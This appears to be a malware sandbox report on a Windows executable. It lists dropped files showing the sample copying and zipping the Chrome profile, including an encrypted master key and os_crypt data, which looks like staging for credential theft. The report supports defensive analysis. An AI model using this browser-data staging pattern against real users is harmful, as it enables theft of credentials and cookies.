          Preview:............ .H............. ............... .p............. .h...n......... ............... ......... .... .....n...((.... .h.......00.... ..%..~H..@@.... .(B..&n..``.... .....N......... .(....D........ ......M..(............. ...............................@g..F...D...D...E...Af..........C...G...?...A...I...A...........:...f.......k...?...C...........:...j...........e...;...........:...l...........o...;...........B...I...I..G...A..:...........A...G...B...9..g...c.$..........Af..E...D...<..c.$........................................(............. ...............................:#..D...C...C...C...C...D...<"..........@W..H...?...>...@...D...H...@W..........@T..E...T...X...S..A...F...@T..........@T..E..............A...E...@T..........?U..E...{...............E...@T..........?U..E...................E...AS..........@T..E...Y...^...]...[...G...AZ..........@T..F..;..;..}8..p!..s&..y1*..........@W..H...D...F...C..m...].4..............<"..D...C...D...A..q!6..............................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.ico.md5

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):16
          Entropy (8bit):4.0
          Encrypted:false
          SSDEEP:3:bIvonQf:bVQf
          MD5:1CA621DFCBB11BF882E9684890E65288
          SHA1:887383B5BF8C2E74AD19F31F9842D23E1758828C
          SHA-256:1913AFE9FA25AF894C2DE2524BA31BE1B01D93BC2E2EF166ADF7D4F0166B03FA
          SHA-512:9DC12848C6840ACF8EEE4406BA069D1FD4CC0314415B9BE1F94781445386CCF7B11FB92482E976E39272152A3B373E5D01952A8D93F24E1BCF0923D869538BA2
          Malicious:false
          Preview:.U6.,....|20'B..

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\Web Data

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
          Category:dropped
          Size (bytes):106496
          Entropy (8bit):1.137181696973627
          Encrypted:false
          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
          MD5:2D903A087A0C793BDB82F6426B1E8EFB
          SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
          SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
          SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
          Malicious:false
          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\databases\Databases.db

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):28672
          Entropy (8bit):0.3410017321959524
          Encrypted:false
          SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
          MD5:98643AF1CA5C0FE03CE8C687189CE56B
          SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
          SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
          SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\heavy_ad_intervention_opt_out.db

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 4, cookie 0x2, schema 4, UTF-8, version-valid-for 2
          Category:dropped
          Size (bytes):16384
          Entropy (8bit):0.35226517389931394
          Encrypted:false
          SSDEEP:12:TLC+waBg9LBgVDBgQjiZBgKuFtuQkMbmgcVAzO5kMCgGUg5OR:TLPdBgtBgJBgQjiZS53uQFE27MCgGZsR
          MD5:D2CCDC36225684AAE8FA563AFEDB14E7
          SHA1:3759649035F23004A4C30A14C5F0B54191BEBF80
          SHA-256:080AEE864047C67CB1586A5BA5EDA007AFD18ECC2B702638287E386F159D7AEE
          SHA-512:1A915AF643D688CA68AEDC1FF26C407D960D18DFDE838B417C437D7ADAC7B91C906E782DCC414784E64287915BD1DE5BB6A282E59AA9FEB8C384B4D4BC5F70EC
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.......Q......Q......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\000003.log

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):3488
          Entropy (8bit):6.430472819920139
          Encrypted:false
          SSDEEP:96:v0bQZIYjIYmzGbDMYjMYWYcYK3vxOT3bT3jT36:eQZIIIbzGbDMIM3YcYRfP+
          MD5:ADAB988EF3DE1E7E37633562E9A67278
          SHA1:4101364727ED70FCD4707A4D6ACCC9A14C549053
          SHA-256:5DF063E2BD61EC84425188DEA234C2DDB4A250AE5AEF8214D300221B4D5BCBA0
          SHA-512:0E43181CC0517EB495709558696BAAA2D99E6E4BBB193715DFE61951BC5C350EAD81063177CEEDC6CA0FD9A1E5C29B604B5B17B7E90DEF1BB7208815D0983669
          Malicious:false
          Preview:A..r.................20_1_1...1.,U.................20_1_1...1..&f....................................4_IPH_BatterySaverMode...IPH_BatterySaverMode......4_IPH_CompanionSidePanel...IPH_CompanionSidePanel.....$4_IPH_CompanionSidePanelRegionSearch(."IPH_CompanionSidePanelRegionSearch......4_IPH_DesktopCustomizeChrome ..IPH_DesktopCustomizeChrome......4_IPH_DownloadToolbarButton...IPH_DownloadToolbarButton.....&4_IPH_FocusHelpBubbleScreenReaderPromo*.$IPH_FocusHelpBubbleScreenReaderPromo......4_IPH_GMCCastStartStop...IPH_GMCCastStartStop......4_IPH_HighEfficiencyMode...IPH_HighEfficiencyMode......4_IPH_LiveCaption...IPH_LiveCaption......4_IPH_PasswordsAccountStorage!..IPH_PasswordsAccountStorage.....(4_IPH_PasswordsManagementBubbleAfterSave,.&IPH_PasswordsManagementBubbleAfterSave.....+4_IPH_PasswordsManagementBubbleDuringSignin/.)IPH_PasswordsManagementBubbleDuringSignin....."4_IPH_PasswordsWebAppProfileSwitch&. IPH_PasswordsWebAppProfileSwitch......4_IPH_PerformanceNewBadge...IPH_Perform

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\CURRENT

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):16
          Entropy (8bit):3.2743974703476995
          Encrypted:false
          SSDEEP:3:1sjgWIV//Uv:1qIFUv
          MD5:46295CAC801E5D4857D09837238A6394
          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
          Malicious:false
          Preview:MANIFEST-000001.

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\LOG

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):328
          Entropy (8bit):5.2407192146684825
          Encrypted:false
          SSDEEP:6:kuAQ+q2PcNwi23iKKdKfrK+IFUtjAgZmwxAQVkwOcNwi23iKKdKfrUeLJ:kuAVvLZ5Kk23FUtjAg/xAI54Z5Kk3J
          MD5:044108F32B73F3B5F774E17B3A0A1DB4
          SHA1:316621DC7E8172C7D73A90B92F3F74220A26B21F
          SHA-256:4573FA85F8CF6FA63F86037537A660BCF6EC160363DD6248DDA09AF623437852
          SHA-512:11840868CCFAE5D37B696FA714054FBFE44FF694BD67BD717861C723801EAA95298728B5196539EF9C65D43E0C92BEC715DD1BFCBF6ACB9D0E579A711A221D78
          Malicious:false
          Preview:2023/10/05-08:51:52.909 1d48 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/MANIFEST-000001.2023/10/05-08:51:52.909 1d48 Recovering log #3.2023/10/05-08:51:52.909 1d48 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\LOG.old

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):328
          Entropy (8bit):5.265220803491113
          Encrypted:false
          SSDEEP:6:kusiF4Iq2PcNwi23iKKdKfrK+IFUtjsiF4ZZmwxsbekwOcNwi23iKKdKfrUeLJ:kuxF4IvLZ5Kk23FUtjxF4Z/xWe54Z5Kc
          MD5:FE98B5F272AFF6D1298AEAC70DA2C394
          SHA1:8BD2BC6B37EAF1F33D369DB6FA4EF54FD63F9381
          SHA-256:E9D3170BFA2BE3247796F06E7FBF093BAECF3787EECB463F9C8B1F9D808AAD08
          SHA-512:A9650E17D67FFDC04C69E0E9F382CE7AB133543D035A018EF967E21FD027266FD6021A45E7A6B5A47E68BF10F78E05C5B340DA4A060E6E8A67A4E6E41EBE266F
          Malicious:false
          Preview:2023/10/05-08:51:49.496 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/MANIFEST-000001.2023/10/05-08:51:49.496 1e30 Recovering log #3.2023/10/05-08:51:49.497 1e30 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\MANIFEST-000001

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:OpenPGP Secret Key
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.704993772857998
          Encrypted:false
          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
          Malicious:false
          Preview:.|.."....leveldb.BytewiseComparator......

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\000003.log

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1117
          Entropy (8bit):4.117374471371382
          Encrypted:false
          SSDEEP:24:G0nYgWK6oMlxN0PrxvhC+lvBl58l8Qzmmp0CzVZ2bVHoxwqs:LYg9gN4xvxdB7QzmE0a/2bVHoxwqs
          MD5:C67C6EF98AF2795CF8CE93AF3A6AD2C1
          SHA1:5412605A5AF8AF4C61A20D809F64ADEA71BB2796
          SHA-256:BCDE91E45F89D90148246B6070C02A08DC505A8D92183408A5AF4EA2DAC64E3E
          SHA-512:0FB1EE069D707674AFDDE33E2A2199C8F81EFF26EB56B34E21310DC05C9096ECA1B1E58294E32687B91434E109F3AC754A516D29F9C7263F05955274253A7734
          Malicious:false
          Preview:.h.6.................__global... .t...................__global... ...w.................44_.....B....................33_.........................44_......'..................33_.......fA.................41_.....s....................41_......u...................__global... ..92..................__global... ..&vB.................20_.......pp.................19_........].................20_.....Owa..................20_.....`..N.................19_..........................37_.....9 '<.................38_........J.................39_.......?..................3_......-...................18_......|...................4_......@o..................37_.....<[..................21_...../L...................21_.....1.Q.................38_.......4..................3_..........................39_......[...................18_.....L.(t.................4_......U..................9_..........................9_.....D.^.... .............__global... .......!.............__global... .nb...."...........

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\CURRENT

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):16
          Entropy (8bit):3.2743974703476995
          Encrypted:false
          SSDEEP:3:1sjgWIV//Uv:1qIFUv
          MD5:46295CAC801E5D4857D09837238A6394
          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
          Malicious:false
          Preview:MANIFEST-000001.

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\LOG

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):346
          Entropy (8bit):5.232025543082696
          Encrypted:false
          SSDEEP:6:kuACt+q2PcNwi23iKKdKfrzAdIFUtjAC5ZmwxACtVkwOcNwi23iKKdKfrzILJ:kuAbvLZ5Kk9FUtjA+/xAy54Z5Kk2J
          MD5:FB0EB693CD02D005CEFCAB70D2EC5C5B
          SHA1:C3BD59444C316816F97E9858BB8E3E3AC26AA42C
          SHA-256:96EFF6ED3E9A38FE7C6388BB5ED589DAB18D49DF6FB584C014E696893809FFC1
          SHA-512:8FC93DBB974C93C1BF33E14CAF9E6E07267E4638D3EE2F073E1636D5236EBC9A09A3C7273E1028208D9A53DE3FB1BF9DB58738AEBAFE0EFDCB335DB14253FDEA
          Malicious:false
          Preview:2023/10/05-08:51:52.907 1d48 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2023/10/05-08:51:52.907 1d48 Recovering log #3.2023/10/05-08:51:52.907 1d48 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\LOG.old

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text
          Category:dropped
          Size (bytes):346
          Entropy (8bit):5.208625739470281
          Encrypted:false
          SSDEEP:6:kusgF4Iq2PcNwi23iKKdKfrzAdIFUtjscXZmwxscFkwOcNwi23iKKdKfrzILJ:kuCIvLZ5Kk9FUtjx/xr54Z5Kk2J
          MD5:63A82D7441EDC38BD95D1B07443D98C4
          SHA1:9E90DD1DDB04B7E464A55BE57943F60AFA463C97
          SHA-256:A25FB4D420CE68B6546507101FA307B2B12147CF9891407B1FA5A083FB3FD15B
          SHA-512:6F790DE0CADF1C05328A9876F281282440346A1E3A7B808C7314891FA49A3EF6550C49AF50918EE07AFDD6A35560F8A9B5EFB5AB2F7EA59627C9937D86BFD5A0
          Malicious:false
          Preview:2023/10/05-08:51:49.494 1e30 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2023/10/05-08:51:49.495 1e30 Recovering log #3.2023/10/05-08:51:49.495 1e30 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata/000003.log .

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\shared_proto_db\metadata\MANIFEST-000001

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:OpenPGP Secret Key
          Category:dropped
          Size (bytes):41
          Entropy (8bit):4.704993772857998
          Encrypted:false
          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
          Malicious:false
          Preview:.|.."....leveldb.BytewiseComparator......

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Default\trusted_vault.pb

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):38
          Entropy (8bit):4.023471592049354
          Encrypted:false
          SSDEEP:3:N0DIQVoKy:a8Q+
          MD5:3433CCF3E03FC35B634CD0627833B0AD
          SHA1:789A43382E88905D6EB739ADA3A8BA8C479EDE02
          SHA-256:F7D5893372EDAA08377CB270A99842A9C758B447B7B57C52A7B1158C0C202E6D
          SHA-512:21A29F0EF89FEC310701DCAD191EA4AB670EDC0FC161496F7542F707B5B9CE619EB8B709A52073052B0F705D657E03A45BE7560C80909E92AE7D5939CE688E9C
          Malicious:false
          Preview:..... 2a68348c2ca0c50ad315d43d90f5a986

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Last Browser

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):106
          Entropy (8bit):3.138546519832722
          Encrypted:false
          SSDEEP:3:tbloIlrJ5ldQxl7aXVdJiG6R0RlAl:tbdlrnQxZaHIGi0R6l
          MD5:DE9EF0C5BCC012A3A1131988DEE272D8
          SHA1:FA9CCBDC969AC9E1474FCE773234B28D50951CD8
          SHA-256:3615498FBEF408A96BF30E01C318DAC2D5451B054998119080E7FAAC5995F590
          SHA-512:CEA946EBEADFE6BE65E33EDFF6C68953A84EC2E2410884E12F406CAC1E6C8A0793180433A7EF7CE097B24EA78A1FDBB4E3B3D9CDF1A827AB6FF5605DA3691724
          Malicious:false
          Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e...e.x.e.

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Last Version

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):14
          Entropy (8bit):2.9852281360342525
          Encrypted:false
          SSDEEP:3:NYLYdR:auR
          MD5:CFF0A1C786FFD0ED820350C5AE8A9E3A
          SHA1:F1C65FEE9601D6C4451B4C1EE3F165DC83C5211B
          SHA-256:3F203968EAB70F6FCEEBED6DFBA8F57332FE48CC665206F0756AB54F8432BC52
          SHA-512:8612C4A2E2455480212F5B0ABF6F2BE6429C4FE8879D70090DC478CF355453D4B7E219F3E73BF48C1BFD3C73B55F55F5004293AC9D783FED4D0493B43A8F901A
          Malicious:false
          Preview:117.0.5938.134

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Local State

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):66874
          Entropy (8bit):6.046007742131735
          Encrypted:false
          SSDEEP:1536:tbZm1NWMz6BiFMns3TnOOL1l2d0aUjV4v:BMz6BEMny6OL1YF+w
          MD5:304372125457EA54A5E021A3204E4AE4
          SHA1:3D2853EE63792DA0DD4F029D313AD387E4CD23F0
          SHA-256:6A7E77825E16189ADC252F8A7E08EA626498C219128A14B905870B84D7BF3097
          SHA-512:172B21706D4217CE554BFB2E9728FE29CC18F3E64B760EEFAD8EFCF7E22AEE44522C3E06275EB84D92939F478017ED7032225C7CF08352A199B4C08A12CC069E
          Malicious:false
          Preview:{"browser":{"first_run_finished":true,"shortcut_migration_version":"117.0.5938.134"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"management":{"platform":{"azure_active_directory":0,"enterprise_mdm_win":0}},"network_time":{"network_time_mapping":{"local":1.696492313360066e+12,"network":1.696492312e+12,"ticks":51162337.0,"uncertainty":1740796.0}},"os_crypt":{"app_bound_fixed_data":"AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAG7I4XamucEiJgTIvWNrX8QAAAAACAAAAAAAQZgAAAAEAACAAAAAPQcnJ37Osrz3LXkc8SNb7+dvmnpKKSyCOEIIndMy9NwAAAAAOgAAAAAIAACAAAAAhxWF/HI4j2N8Uz5danfSW8MdSYLQzwvpLy9AyeXwgoWABAAAxqR3kIyvYmeWbgl9FBFx2veEWAP5nxPFziCuZU+uaPtferF1OnCLBzuvCaT1XMjeky3tb5TNl4qWLS6Tq5UuQsDMppnsmWAWDyILVvybag7KthmsqsvCcPpTUWINRbOhRWpq+zyADhMWPF9rCMM5/uaizSz83MiOP4EFYuTrG5RBYS7hKoxV8KhJgZA8JSghcKcfRD2f8y19t1WpSsQY9iDw7uyhkCNEIjQeMQq9qi4eOCZg5WLdSZprTxO0Fd1psgHC2T8k0f3EaON1+2z4L4kpniR2tXFPYnDtwlO61R2shdQTs/Z/HOAYufyM1htPwTz7e3osVymOyDCFPxTr75a4Dvq

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\Variations

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):85
          Entropy (8bit):4.3488360343066725
          Encrypted:false
          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ25AmIpozQan:YQ3Kq9X0dMgAEiLIM
          MD5:BC6142469CD7DADF107BE9AD87EA4753
          SHA1:72A9AA05003FAB742B0E4DC4C5D9EDA6B9F7565C
          SHA-256:B26DA4F8C7E283AA74386DA0229D66AF14A37986B8CA828E054FC932F68DD557
          SHA-512:47D1A67A16F5DC6D50556C5296E65918F0A2FCAD0E8CEE5795B100FE8CD89EAF5E1FD67691E8A57AF3677883A5D8F104723B1901D11845B286474C8AC56F6182
          Malicious:false
          Preview:{"user_experience_metrics.stability.exited_cleanly":true,"variations_crash_streak":0}

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\first_party_sets.db

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 12, cookie 0xa, schema 4, UTF-8, version-valid-for 9
          Category:dropped
          Size (bytes):49152
          Entropy (8bit):0.5167739226498602
          Encrypted:false
          SSDEEP:48:T27/IHRH34kWqB1kQnjhHmr6ITmUNpLz:iDIHRHIbKkQndHmLX
          MD5:24AABC1B53CDAC31DA2BC88CCE92BB22
          SHA1:D05E5F98A64E2F00C36A42FCF65D0C75D932C21D
          SHA-256:5713972D0F6AD6D6BAC6796CDD87672D59EF9EF1933E268A5CCD38CBF98B4FEE
          SHA-512:A409F945D434DD75CF6FFACFBD68F5715C3A0B526A2C03BFB378FFD8B3F0DFA76F74212863320B2833D588E5CF9C259A8EE2C1478537FD3A6344264EE2D9BF60
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.......\..g.................C.\......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\segmentation_platform\ukm_db

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 7, cookie 0x6, schema 4, UTF-8, version-valid-for 6
          Category:dropped
          Size (bytes):28672
          Entropy (8bit):0.35721947592478775
          Encrypted:false
          SSDEEP:24:TLHNrCuoxbGduhr2fk05b53HxOSRtK0J4ApCu:TxC4QB2zbBxx
          MD5:CF7B71E1F446640439290AAD6A36394F
          SHA1:3B9BFB524A8A82980E72DF39872AE77363CC9F85
          SHA-256:3B8B5249AF39D78D22B02D9E0E4DC26266086BBB77CAADBF28F1E38E8944691D
          SHA-512:C1707F678A11F0E3DED6D0634506554AC3E19D82A839991E1EDEE41BC70A0A6164F4AF4DE325B18E2BCB22C6C0CE21F62B6497FC54FCEBF0409FBF986519B84E
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..................x..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Google\Chrome\User Data Temp\source_info.json

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):204
          Entropy (8bit):5.43546557863424
          Encrypted:false
          SSDEEP:6:YGwTO6lYmSfDlQC/QC3swpJNWD+vkDbMyJWm4:YGYO6lYmSZHs0JEDJWm4
          MD5:0D4E9BE23FF6F3D515C821485D3DFC11
          SHA1:DEDEB2FE5907177740EB6DAD3B4B2E7AAF552F04
          SHA-256:46039745BA4FE5E4A747E0F0ABDD5D6BCB3F3D495F5459D1D458F4134260CD50
          SHA-512:F2CC04D6AABCA3E1481A5DCF8480F0794FD41063C21ADDCF7BAEF149B27728987444E063F09836A6B57A1B5AF7E0BD80EEB497B8553AD1394CB40EA6769D6973
          Malicious:false
          Preview:{"created_at":1724171098,"encrypted_master_key":"PTjKI4fGzS6O6tUPYCF4HalwOBgP+ovXzdDZniyk/6ex1OVU1BeugRt2yR/dtMx7","source_user_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data"}

          C:\Users\user\AppData\Local\Google\Chrome\user_data.zip

          Download File
          Process:C:\Users\user\Desktop\file.exe
          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
          Category:dropped
          Size (bytes):408281
          Entropy (8bit):7.940997308686631
          Encrypted:false
          SSDEEP:12288:8Z/52if8A2z8lQ4/YOvmsMWWnsDUunHuFKYj:zdA2Q8OvPWlIHbe
          MD5:9F592D982CD20D251DA66C3F6405AF9A
          SHA1:BB00EA11256C4C8C0F3B6FA13B2BC7C246796028
          SHA-256:FA833DDE53C53ABB4736F9AB28D2AFFCA313367DBA03F9726FDFA59964652164
          SHA-512:3BB296C1DA07986CAF88E881A59C2F4CCEDBDE4A77AC34A6C3BDFEE0F7C523D39AF660117E111005A4E3C39239EAAC92DF4646452A45706B965AC76E8ED22B53
          Malicious:false
          Preview:PK.........c.Y............+...User Data Temp\Default\Affiliation DatabaseUT...W..f...n.T......eQE.....5.(B.....!"u.i...r.....i....y.^`6..G..l..D.G.gZ.V...'.....u"].'u?V.2..^,?..B...R.!6..9q+#.X..5....._..D6.Z.O._v~.Q.....\.~..,......7.-#oY....~.u.X."?.E.([m..-[./.L.d......V..+M.4Z.9........,.0..7,M...z.]u.X..0.....-.....M#.........v.".. ....p+U.BR....9-.......J.\~c...Y.Qs.M..vZEy.U.....7.Go^^.bwn.YB6...T..3...w,.p.].[..VN..#.(....Z#.0..%mt0..=a...@..j.....7oN/......eG'E-.da.....a.K%.E.n.t..8sw.oF...}r.........5k.,..;.to.....-..L&.Z..~....-...LrW...;. RWC.k/.....$..%.#ue.J..?8....3..~Z.s..?........b..~.f.....vO['..Z......F....T.%.k...-.....w.l^....^w..w.>Z.......n9...!6...m!.n.....o..e........m...Cs.....}/./..}......5}....j..w...Q...T..........}.......[...j.<..s..6....?.{......lp.................................Xu.......X}.........c................V.......PK..aU..I.......PK.........c.Y............3...User Data Temp\Default\Affiliat

          Static File Info

          General

          File type:PE32+ executable (GUI) x86-64, for MS Windows
          Entropy (8bit):5.483024959260784
          TrID:
          • Win64 Executable GUI (202006/5) 92.65%
          • Win64 Executable (generic) (12005/4) 5.51%
          • Generic Win/DOS Executable (2004/3) 0.92%
          • DOS Executable Generic (2002/1) 0.92%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:file.exe
          File size:17'171'948 bytes
          MD5:1f6c6f36d126cd027ded1915e321c693
          SHA1:41645700d79852f1d2bac3ca637e8b07245574de
          SHA256:cc3557f4fdaad9aa47bf46dce4f0a8e0a45d7e81084962a54b67b4f55f8bf64c
          SHA512:b20fabefb977fb89cba1e043716a3fc544faff5933f0d9aa1d6470545bd367b177d7ed087a499945cdb65c346b88bb165c67af868422b32d81b41edcc6da087c
          SSDEEP:98304:8WJWZ3fhw2RuB0yZ8KhBc18zCEy5h3RUcNikFElaeDiyilOIN+gkypKuZ8U:ZWfhwH0L18zPy1Nik+RmJkhypn
          TLSH:E5076B43E89540B9C59AE231C96682527B757C48873177EB3B60F7B87F76BC0AA78700
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d............(....".......E..'................@.....................................4.....`... ............................

          File Icon

          Icon Hash:3d2d2f3d59ce8f49

          Static PE Info

          General

          Entrypoint:0x46e0a0
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:1
          File Version Major:6
          File Version Minor:1
          Subsystem Version Major:6
          Subsystem Version Minor:1
          Import Hash:c2d457ad8ac36fc9f18d45bffcd450c2

          Entrypoint Preview

          Instruction
          jmp 00007FD7647A4F40h
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push ebp
          dec eax
          mov ebp, esp
